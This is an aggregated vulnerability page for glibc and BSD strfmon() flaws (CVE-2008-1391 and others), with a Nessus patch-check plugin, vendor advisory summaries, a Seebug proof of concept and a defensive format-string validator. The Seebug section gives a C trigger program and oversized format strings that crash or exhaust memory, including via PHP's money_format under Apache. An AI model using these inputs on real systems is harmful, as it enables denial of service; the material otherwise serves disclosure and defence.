if (NASL_LEVEL < 3000) exit(0);

include("compat.inc");

if (description)
{
  script_id(49758);
  script_version("1.4");
  script_cvs_date("Date: 2019/10/25 13:36:37");

  script_cve_id("CVE-2008-1391", "CVE-2010-0296", "CVE-2010-0830");

  script_name(english:"SuSE9 Security Update : glibc (YOU Patch Number 12641)");
  script_summary(english:"Checks rpm output for the updated packages");

  script_set_attribute(
    attribute:"synopsis",
    value:"The remote SuSE 9 host is missing a security-related patch."
  );
  script_set_attribute(
    attribute:"description",
    value:
    "Several security issues were fixed :

  - Integer overflow causing arbitrary code execution in
    ld.so --verify mode could be induced by a specially
    crafted binary. (CVE-2010-0830)

  - The addmntent() function would not escape the newline
    character properly, allowing the user to insert
    arbitrary newlines to the /etc/mtab; if the addmntent()
    is run by a setuid mount binary that does not do extra
    input checking, this would allow custom entries to be
    inserted in /etc/mtab. (CVE-2010-0296)

  - The strfmon() function contains an integer overflow
    vulnerability in width specifiers handling that could be
    triggered by an attacker that can control the format
    string passed to strfmon(). (CVE-2008-1391)

Also one non-security issue was fixed:

  - nscd in the paranoia mode would crash on the periodic
    restart in case one of the databases was disabled in the
    nscd configuration.

In addition, the timezone information was updated to the level of
2010l, including the following changes :

  - Africa/Cairo (Egypt) and Asia/Gaza (Palestine) do not use
    daylight saving during the month of Ramadan in order to
    prevent Muslims from fasting one hour longer.
    http://www.timeanddate.com/news/time/egypt-ends-dst-2010
    .html
    http://www.timeanddate.com/news/time/westbank-gaza-end-d
    st-2010.html

  - Africa/Casablanca (Marocco) has spent the period from May
    2 to Aug 8 using daylight saving. Marocco adopted regular
    daylight saving, but the start and end dates vary every
    year.
    http://www.timeanddate.com/news/time/morocco-starts-dst-
    2010.html

  - America/Argentina/San_Luis (Argentina region) local
    government did not terminate its DST period as planned
    and instead decided to extend its use of the UTC-3 time
    indefinitely.
    http://www.worldtimezone.com/dst_news/dst_news_argentina
    08.html

New zones :

  - America/Bahia_Banderas (Mexican state of Nayarit) has
    declared that it is to follow the UCT-6 time instead of
    UCT-7, with the aim to have the same time as the nearby
    city of Puerto Vallarta.
    http://www.worldtimezone.com/dst_news/dst_news_mexico08.
    html

Historical changes :

  - Asia/Taipei information on DST usage listed 1980 as one
    year using DST, which should read 1979 instead according
    to government resources.

  - Europe/Helsinki, before switching to Central European
    standard DST in 1983, trialled DST for two years.
    However, the database omitted to specify that in these
    trials of 1981 and 1982, switches have been made one hour
    earlier than in 1983.

Spelling changes in Micronesia:

  - Pacific/Truk has been renamed to Pacific/Chuuk in 1989.

  - Pacific/Ponape has been renamed to Pacific/Pohnpei in
    1984."
  );
  script_set_attribute(
    attribute:"see_also",
    value:"http://support.novell.com/security/cve/CVE-2008-1391.html"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"http://support.novell.com/security/cve/CVE-2010-0296.html"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"http://support.novell.com/security/cve/CVE-2010-0830.html"
  );
  script_set_attribute(attribute:"solution", value:"Apply YOU patch number 12641.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_cwe_id(189);

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:suse:suse_linux");
  script_set_attribute(attribute:"patch_publication_date", value:"2010/08/25");
  script_set_attribute(attribute:"plugin_publication_date", value:"2010/10/06");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2010-2019 Tenable Network Security, Inc.");
  script_family(english:"SuSE Local Security Checks");

  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Host/cpu", "Host/SuSE/release", "Host/SuSE/rpm-list");

  exit(0);
}

include("global_settings.inc");
include("rpm.inc");

if (!get_kb_item("Host/local_checks_enabled")) exit(0, "Local checks are not enabled.");
if (!get_kb_item("Host/SuSE/release")) exit(0, "The host is not running SuSE.");
if (!get_kb_item("Host/SuSE/rpm-list")) exit(1, "Could not obtain the list of installed packages.");

cpu = get_kb_item("Host/cpu");
if (isnull(cpu)) exit(1, "Failed to determine the architecture type.");
if (cpu >!< "x86_64" && cpu !~ "^i[3-6]86$") exit(1, "Local checks for SuSE 9 on the '"+cpu+"' architecture have not been implemented.");

flag = 0;
if (rpm_check(release:"SUSE9", reference:"glibc-2.3.3-98.114")) flag++;
if (rpm_check(release:"SUSE9", reference:"glibc-devel-2.3.3-98.114")) flag++;
if (rpm_check(release:"SUSE9", reference:"glibc-html-2.3.3-98.114")) flag++;
if (rpm_check(release:"SUSE9", reference:"glibc-i18ndata-2.3.3-98.114")) flag++;
if (rpm_check(release:"SUSE9", reference:"glibc-info-2.3.3-98.114")) flag++;
if (rpm_check(release:"SUSE9", reference:"glibc-locale-2.3.3-98.114")) flag++;
if (rpm_check(release:"SUSE9", reference:"glibc-profile-2.3.3-98.114")) flag++;
if (rpm_check(release:"SUSE9", reference:"nscd-2.3.3-98.114")) flag++;
if (rpm_check(release:"SUSE9", reference:"timezone-2.3.3-98.114")) flag++;
if (rpm_check(release:"SUSE9", cpu:"x86_64", reference:"glibc-32bit-9-201008251911")) flag++;
if (rpm_check(release:"SUSE9", cpu:"x86_64", reference:"glibc-devel-32bit-9-201008251304")) flag++;
if (rpm_check(release:"SUSE9", cpu:"x86_64", reference:"glibc-locale-32bit-9-201008251304")) flag++;

if (flag)
{
  if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());
  else security_hole(0);
  exit(0);
}
else exit(0, "The host is not affected.");
NASL family Ubuntu Local Security Checks
NASL id UBUNTU_USN-944-1.NASL
description Maksymilian Arciemowicz discovered that the GNU C library did not correctly handle integer overflows in the strfmon function. If a user or automated system were tricked into processing a specially crafted format string, a remote attacker could crash applications, leading to a denial of service. (Ubuntu 10.04 was not affected.) (CVE-2008-1391) Jeff Layton and Dan Rosenberg discovered that the GNU C library did not correctly handle newlines in the mntent family of functions. If a local attacker were able to inject newlines into a mount entry through other vulnerable mount helpers, they could disrupt the system or possibly gain root privileges. (CVE-2010-0296) Dan Rosenberg discovered that the GNU C library did not correctly validate certain ELF program headers. If a user or automated system were tricked into verifying a specially crafted ELF program, a remote attacker could execute arbitrary code with user privileges. (CVE-2010-0830). Note that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
last seen 2020-06-01
modified 2020-06-02
plugin id 46731
published 2010-05-26
reporter Ubuntu Security Notice (C) 2010-2019 Canonical, Inc. / NASL script (C) 2010-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source https://www.tenable.com/plugins/nessus/46731
title Ubuntu 6.06 LTS / 8.04 LTS / 9.04 / 9.10 / 10.04 LTS : glibc, eglibc vulnerabilities (USN-944-1)

NASL family SuSE Local Security Checks
NASL id SUSE_11_1_GLIBC-101026.NASL
description This update of glibc fixes various bugs and security issues : CVE-2010-3847: Decoding of the $ORIGIN special value in various LD_ environment variables allowed local attackers to execute code in the context of e.g. setuid root programs, elevating privileges. This issue does not affect SUSE as an assertion triggers before the respective code is executed. The bug was fixed nevertheless. CVE-2010-3856: The LD_AUDIT environment was not pruned during setuid root execution and could load shared libraries from standard system library paths. This could be used by local attackers to inject code into setuid root programs and so elevate privileges. CVE-2010-0830: Integer overflow causing arbitrary code execution in ld.so --verify mode could be induced by a specially crafted binary. CVE-2010-0296: The addmntent() function would not escape the newline character properly, allowing the user to insert arbitrary newlines into /etc/mtab; if addmntent() is run by a setuid mount binary that does not do extra input checking, this would allow custom entries to be inserted in /etc/mtab. CVE-2008-1391: The strfmon() function contains an integer overflow vulnerability in width specifier handling that could be triggered by an attacker who can control the format string passed to strfmon(). CVE-2010-0015: Some setups (mainly Solaris-based legacy setups) include shadow information (password hashes) as so-called
last seen 2020-06-01
modified 2020-06-02
plugin id 50367
published 2010-10-28
reporter This script is Copyright (C) 2010-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source https://www.tenable.com/plugins/nessus/50367
title openSUSE Security Update : glibc (openSUSE-SU-2010:0914-1)

NASL family Debian Local Security Checks
NASL id DEBIAN_DSA-2058.NASL
description Several vulnerabilities have been discovered in the GNU C Library (aka glibc) and its derivatives. The Common Vulnerabilities and Exposures project identifies the following problems :
- CVE-2008-1391, CVE-2009-4880, CVE-2009-4881 Maksymilian Arciemowicz discovered that the GNU C library did not correctly handle integer overflows in the strfmon family of functions. If a user or automated system were tricked into processing a specially crafted format string, a remote attacker could crash applications, leading to a denial of service.
- CVE-2010-0296 Jeff Layton and Dan Rosenberg discovered that the GNU C library did not correctly handle newlines in the mntent family of functions. If a local attacker were able to inject newlines into a mount entry through other vulnerable mount helpers, they could disrupt the system or possibly gain root privileges.
- CVE-2010-0830 Dan Rosenberg discovered that the GNU C library did not correctly validate certain ELF program headers. If a user or automated system were tricked into verifying a specially crafted ELF program, a remote attacker could execute arbitrary code with user privileges.
last seen 2020-06-01
modified 2020-06-02
plugin id 46861
published 2010-06-11
reporter This script is Copyright (C) 2010-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source https://www.tenable.com/plugins/nessus/46861
title Debian DSA-2058-1 : glibc, eglibc - multiple vulnerabilities

NASL family MacOS X Local Security Checks
NASL id MACOSX_SECUPD2008-008.NASL
description The remote host is running a version of Mac OS X 10.4 that does not have Security Update 2008-008 applied. This security update contains fixes for the following products :
- BOM
- CoreGraphics
- CoreServices
- Flash Player Plug-in
- Libsystem
- network_cmds
- UDF
last seen 2020-06-01
modified 2020-06-02
plugin id 35110
published 2008-12-16
reporter This script is Copyright (C) 2008-2018 Tenable Network Security, Inc.
source https://www.tenable.com/plugins/nessus/35110
title Mac OS X Multiple Vulnerabilities (Security Update 2008-008)
Seebug
bulletinFamily | exploit |
description | BUGTRAQ ID: 28479
CVE ID: CVE-2008-1391
CNCVE ID: CNCVE-20081391
The 'strfmon()' function on multiple BSD platforms contains an integer overflow that may allow arbitrary code execution in the context of the affected application. Failed attempts can result in a denial of service.
The affected interface looks like this:
#include <monetary.h>
ssize_t strfmon(char * restrict s, size_t maxsize, const char * restrict format, ...);
- --- 1. /usr/src/lib/libc/stdlib/strfmon.c - integer overflow
The main problem lies in the strfmon() function when it is used as follows:
- ---example-start--
#include <stdio.h>
#include <monetary.h>
int main(int argc, char* argv[]){
    char buff[51];
    char *bux=buff;
    int res;
    if (argc < 2) {                 /* argument check added; the original PoC assumed argv[1] was present */
        fprintf(stderr, "usage: %s <format>\n", argv[0]);
        return 1;
    }
    /* argv[1] is used directly as the strfmon format string: this is what triggers the overflow */
    res=strfmon(bux, 50, argv[1], 0.0);   /* the original PoC passed the string "0"; strfmon expects a double */
    (void)res;
    return 0;
}
- ---example-end--
Compile it and feed it a format string such as:
cxib# ./pln %99999999999999999999n
Segmentation fault (core dumped)
The problem is as follows:
cxib# gdb -q pln
(no debugging symbols found)...(gdb) r %99999999999999999999n
Starting program: /cxib/C/pln %99999999999999999999n
(no debugging symbols found)...(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x2814e0e6 in memmove () from /lib/libc.so.7
(gdb)
memmove() reallocates memory.
cxib# gdb -q pln
(no debugging symbols found)...(gdb) r %.9999999999n
Starting program: /cxib/C/pln %.9999999999n
(no debugging symbols found)...(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x2814f093 in abort () from /lib/libc.so.7
The next example is:
cxib# ./pln %#99999999999999999999n
Long execution time.
Let's try to check this process :
- --------------------------
cxib# ps -aux | grep pln
cxib 1843 89.1 13.2 140320 119588 p2 R+ 4:29PM 0:09.68 ./pln %#99999999999999999999n
cxib# ps -aux | grep pln
cxib 1843 94.7 48.4 482336 438236 p2 R+ 4:29PM 1:54.07 ./pln %#99999999999999999999n
1 VSZ=140320
2 VSZ=482336
- ----------------------------
pln keeps allocating more memory. PHP uses strfmon() in its money_format() function; with mod_php5 under Apache we can build an attack along these lines, with the following result:
- ---apache-child-die---
swap_pager: out of swap space
swap_pager_getswapspace(16): failed
Mar 15 21:03:23 cxib kernel: pid 1210 (httpd), uid 80, was killed: out of swap space
- ---apache-child-die---
NetBSD: NetBSD 4.0
FreeBSD: FreeBSD 6.0 .x
FreeBSD: FreeBSD 6.0 -STABLE
FreeBSD: FreeBSD 6.0 -RELEASE
FreeBSD: FreeBSD 7.0 BETA4
FreeBSD: FreeBSD 7.0 -RELENG
FreeBSD: FreeBSD 7.0 -PRERELEASE
FreeBSD: FreeBSD 7.0
FreeBSD: FreeBSD 6.0 -RELEASE-p5
Contact the vendor for patch information:
http://www.netbsd.org/ |
id | SSV:3103 |
last seen | 2017-11-19 |
modified | 2008-03-29 |
published | 2008-03-29 |
reporter | Root |
title | Multiple BSD platforms 'strfmon()' function integer overflow vulnerability |
Statements
contributor | Tomas Hoger |
lastmodified | 2009-09-24 |
organization | Red Hat |
statement | Red Hat does not consider this to be a security issue. A properly written application should not use arbitrary untrusted data as part of the format string passed to functions such as strfmon or the printf family of functions. |
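The Seebug proof of concept above and the Red Hat statement point at the same control: strfmon() takes its field width, left precision and right precision from the format string, so a format string an attacker influences must never reach libc unvalidated, and the fix on the application side is to bound those numbers before libc's GET_NUMBER ever parses them. The following C program is an added example written for this page; it is not code from the advisory, from Seebug, from any BSD libc, or from Red Hat. It validates a caller-supplied strfmon format against the POSIX spec grammar %[=f][^][+|(][!][-][w][#n][.p]{i|n|%}, rejecting any width or precision above the hypothetical limits MAX_FIELD_WIDTH and MAX_PRECISION (so the three PoC strings %99999999999999999999n, %.9999999999n and %#99999999999999999999n are refused up front), and only then calls the real strfmon(). The names strfmon_format_ok, safe_strfmon, parse_bounded and try_format, and both limits, are assumptions of this example, not identifiers from the page.

```c
/* Added example: guard a user-influenced strfmon() format string.
   Not from the advisory or any libc; limits and names are this example's own. */
#include <ctype.h>
#include <errno.h>
#include <stdio.h>
#include <sys/types.h>
#include <monetary.h>

#define MAX_FIELD_WIDTH 64   /* assumed policy limit for w and #n */
#define MAX_PRECISION   16   /* assumed policy limit for .p */

/* Consume a run of decimal digits at *p without ever exceeding `limit`.
   Stores -1 in *out when no digits are present. Returns -1 on overflow. */
static int parse_bounded(const char **p, long limit, long *out)
{
    long v = 0;
    if (!isdigit((unsigned char)**p)) { *out = -1; return 0; }
    while (isdigit((unsigned char)**p)) {
        int d = **p - '0';
        if (v > (limit - d) / 10)          /* v*10 + d would exceed limit */
            return -1;
        v = v * 10 + d;
        (*p)++;
    }
    *out = v;
    return 0;
}

/* Walk the format and count conversions. Returns the number of %i/%n
   conversions, or -1 if the format is malformed or any width/precision
   exceeds the limits. "%%" is a literal and is not counted. */
int strfmon_format_ok(const char *fmt)
{
    int conversions = 0;
    for (const char *p = fmt; *p; p++) {
        if (*p != '%') continue;
        p++;
        if (*p == '%') continue;           /* literal percent sign */
        for (;;) {                         /* flags: =f ^ + ( ! - */
            if (*p == '=') { if (!p[1]) return -1; p += 2; }
            else if (*p == '^' || *p == '+' || *p == '(' || *p == '!' || *p == '-') p++;
            else break;
        }
        long w, n, prec;
        if (parse_bounded(&p, MAX_FIELD_WIDTH, &w) < 0) return -1;      /* field width */
        if (*p == '#') {                                                  /* left precision */
            p++;
            if (parse_bounded(&p, MAX_FIELD_WIDTH, &n) < 0 || n < 0) return -1;
        }
        if (*p == '.') {                                                  /* right precision */
            p++;
            if (parse_bounded(&p, MAX_PRECISION, &prec) < 0 || prec < 0) return -1;
        }
        if (*p != 'i' && *p != 'n') return -1;                            /* conversion char */
        conversions++;
    }
    return conversions;
}

/* Format exactly one amount. Refuses the call (errno = EINVAL) unless the
   format passes validation and carries exactly one conversion for `amount`. */
ssize_t safe_strfmon(char *buf, size_t size, const char *fmt, double amount)
{
    if (strfmon_format_ok(fmt) != 1) { errno = EINVAL; return -1; }
    return strfmon(buf, size, fmt, amount);
}

/* Convenience wrapper over a local buffer so the guard can be exercised end to end. */
ssize_t try_format(const char *fmt, double amount)
{
    char out[64];
    return safe_strfmon(out, sizeof out, fmt, amount);
}

int main(int argc, char **argv)
{
    const char *fmt = argc > 1 ? argv[1] : "%n";   /* attacker-style input comes from argv */
    char out[64];
    ssize_t len = safe_strfmon(out, sizeof out, fmt, 1234.56);
    if (len < 0) { perror("safe_strfmon rejected format"); return 1; }
    printf("%s\n", out);
    return 0;
}
```

Run it with the PoC strings from the Seebug entry and the call never reaches libc; run it with a plain "%n" or "%=*#10.2n" and strfmon() is invoked as usual. The limits are deliberately small because a money field never needs a width in the billions; the point is that the application, not libc, decides how large those numbers may get.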
References
- http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/stdlib/strfmon.c
- http://lists.apple.com/archives/security-announce//2008//Dec/msg00000.html
- http://secunia.com/advisories/29574
- http://secunia.com/advisories/33179
- http://securityreason.com/achievement_securityalert/53
- http://securityreason.com/securityalert/3770
- http://support.apple.com/kb/HT3338
- http://www.debian.org/security/2010/dsa-2058
- http://www.securityfocus.com/archive/1/490158/100/0/threaded
- http://www.securityfocus.com/bid/28479
- http://www.securitytracker.com/id?1019722
- http://www.us-cert.gov/cas/techalerts/TA08-350A.html
- http://www.vupen.com/english/advisories/2008/3444
- https://exchange.xforce.ibmcloud.com/vulnerabilities/41504
- https://lists.opensuse.org/opensuse-security-announce/2010-10/msg00007.html